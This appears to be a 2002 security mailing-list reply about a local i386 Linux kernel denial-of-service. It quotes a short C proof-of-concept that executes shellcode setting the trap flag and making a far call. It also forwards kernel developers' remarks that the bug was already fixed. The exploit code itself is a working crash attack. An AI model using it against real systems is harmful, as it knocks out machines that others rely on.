RE: i386 Linux kernel DoS

[Leif Sawyer <lsawyer () gci com>]

Christophe Devine writes:
> /* USE AT YOUR OWN RISK ! */
>
> int main( void )
> {
>     char dos[] = "\x9C"                           /* pushfd       */
>                  "\x58"                           /* pop eax      */
>                  "\x0D\x00\x01\x00\x00"           /* or eax,100h  */
>                  "\x50"                           /* push eax     */
>                  "\x9D"                           /* popfd        */
>                  "\x9A\x00\x00\x00\x00\x07\x00";  /* call 07h:00h */
>
>     void (* f)( void );
>
>     f = (void *) dos; (* f)();
>
>     return 1;
> }

You didn't specify which kernel this was being used against, but
this is what the response from LKML is:

> -----Original Message-----
> From: Alan Cox
> Sent: Tuesday, November 12, 2002 3:10 PM
> To: Christoph Hellwig
> Cc: Leif Sawyer; Linux Kernel Mailing List
> Subject: Re: FW: i386 Linux kernel DoS
>
>
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program?  wow :)
>
> Looks like the TF handling bug which was fixed a while ago